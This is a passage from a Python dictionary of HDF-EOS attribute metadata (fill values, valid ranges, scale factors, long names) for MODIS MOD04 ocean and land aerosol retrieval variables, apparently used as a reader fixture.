'Least_Squares_Error_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Least_Squares_Error_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Least square error estimated'},
'Transmitted_Flux_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Transmitted_Flux_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized Transmitted_flux at 7 bands of average solution'},
'Transmitted_Flux_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Transmitted_Flux_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized Transmitted_flux at 7 bands of best solution'},
'Reflected_Flux_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected_flux at 7 bands for average solution'},
'Reflected_Flux_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected_flux at 7 bands for best solution'},
'Angstrom_Exponent_2_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Angstrom_Exponent_2_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-500, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Angstrom exponent for 0.865 and 2.130 micron'},
'Angstrom_Exponent_1_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Angstrom_Exponent_1_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-500, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Angstrom Exponent for 0.550 and 0.865 miron'},
'Backscattering_Ratio_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Backscattering_Ratio_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Backscattering ratio at 7 bands for average solution'},
'Backscattering_Ratio_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Backscattering_Ratio_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Backscattering ratio at 7 bands for best solution'},
'Asymmetry_Factor_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Asymmetry_Factor_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Asymmetry_Factor at 7 bands for average solution'},
'Asymmetry_Factor_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Asymmetry_Factor_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Asymmetry_Factor at 7 bands for best solution'},
'Cloud_Condensation_Nuclei_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Condensation_Nuclei_Ocean', '_FillValue': np.array([-999.], dtype=np.float32), 'valid_range': np.array([0.e+00, 1.e+11], dtype=np.float32), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'CCN/cm^2', 'long_name': 'Column number of CCN at 0.55 micron of both solutions'},
'Effective_Radius_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Effective_Radius_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'micron', 'long_name': 'Effective_Radius at 0.55 micron of both solutions'},
'Mass_Concentration_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mass_Concentration_Ocean', '_FillValue': np.array([-999.], dtype=np.float32), 'valid_range': np.array([ 0., 1000.], dtype=np.float32), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': '1.0e-6g/cm^2', 'long_name': 'Mass_Concentration for best and average solutions'},
'Optical_Depth_Large_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Large_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for large mode of average solution'},
'Optical_Depth_Large_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Large_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for large mode of best solution'},
'Optical_Depth_Small_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Small_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for small mode of average solution'},
'Optical_Depth_Small_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Small_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for small mode of best solution'},
'Effective_Optical_Depth_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Effective_Optical_Depth_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at seven bands for average solution'},
'Effective_Optical_Depth_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Effective_Optical_Depth_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at seven bands for best solution'},
'Solution_Index_Ocean_Large_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solution_Index_Ocean_Large', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([5, 9], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Solution Number index large particles'},
'Solution_Index_Ocean_Small_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solution_Index_Ocean_Small', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([1, 4], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Solution Number index small particles'},
'Quality_Assurance_Crit_Ref_Land_mod04': {'hdfeos_name': 'Quality_Assurance_Crit_Ref_Land', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Runtime QA flags'},
'Quality_Assurance_Land_mod04': {'hdfeos_name': 'Quality_Assurance_Land', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'description': 'see MODIS atmosphere QA plan for details', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Runtime QA flags'},
'STD_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'STD_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 20000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Standard deviation of reflectance at five bands'},
'Mean_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mean_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Mean reflectance at five bands'},
'Number_Pixels_Percentile_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Number_Pixels_Percentile_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 400], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Number of pixels with desired percentile'},
'Optical_Depth_Ratio_Small_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Ratio_Small_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Small mode aerosol fraction'},
'Cloud_Fraction_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Fraction_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 100], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Cloud fraction (%)'},
'Transmitted_Flux_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Transmitted_Flux_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized Transmitted flux at 0.47 and 0.66 micron'},
'Reflected_Flux_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected flux at 0.47, 0.55, and 0.66 micron'},
'Angstrom_Exponent_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Angstrom_Exponent_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-500, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Angstrom exponent for 0.47 and 0.67 micron'},
'Mass_Concentration_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mass_Concentration_Land', '_FillValue': np.array([-999.], dtype=np.float32), 'valid_range': np.array([ 0., 1000.], dtype=np.float32), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': '1.0e-6g/cm^2', 'long_name': 'Mass concentration'},
'Estimated_Uncertainty_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Estimated_Uncertainty_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 20000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Uncertainty of optical thickness at 0.47 and 0.66 micron'},
'Corrected_Optical_Depth_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Corrected_Optical_Depth_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Corrected optical thickness at 0.47, 0.55 and 0.66 micron'},
'Continental_Optical_Depth_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Continental_Optical_Depth_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Continental optical thickness at 0.47, and 0.66 micron'},
'Aerosol_Type_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Aerosol_Type_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([0, 3], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Aerosol Type'},
'QualityWeight_Critical_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'QualityWeight_Critical_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-20, 20], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Quality Flag forCritical_Reflectance based on the Test for fits'},
'QualityWeight_Path_Radiance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'QualityWeight_Path_Radiance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-20, 20], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Quality Flag for Path Radiance based on the Test for fits'},
'Error_Critical_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Error_Critical_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Uncertainty Critical_Reflectance of 0.47 and 0.66 micron'},
'Critical_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Critical_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Critical_Reflectances at 0.47 and 0.66 micron'},
'Error_Path_Radiance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Error_Path_Radiance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([9.999999747378751e-05]), 'scale_factor': np.array([0.]), 'units': 'None', 'long_name': 'Uncertainty of the Path Radiance at 0.47, and 0.66 micron'},
'Path_Radiance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Path_Radiance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Path Radiance at 0.47, and 0.66 micron'},
'Standard_Deviation_Reflectance_Land_All_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Standard_Deviation_Reflectance_Land_All', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Std Dev of Ref at 0.47, 0.66, and 2.1 micron after cloud screening'},
'Mean_Reflectance_Land_All_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mean_Reflectance_Land_All', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Average of Ref at 0.47, 0.66, and 2.1 micron after cloud screening'},
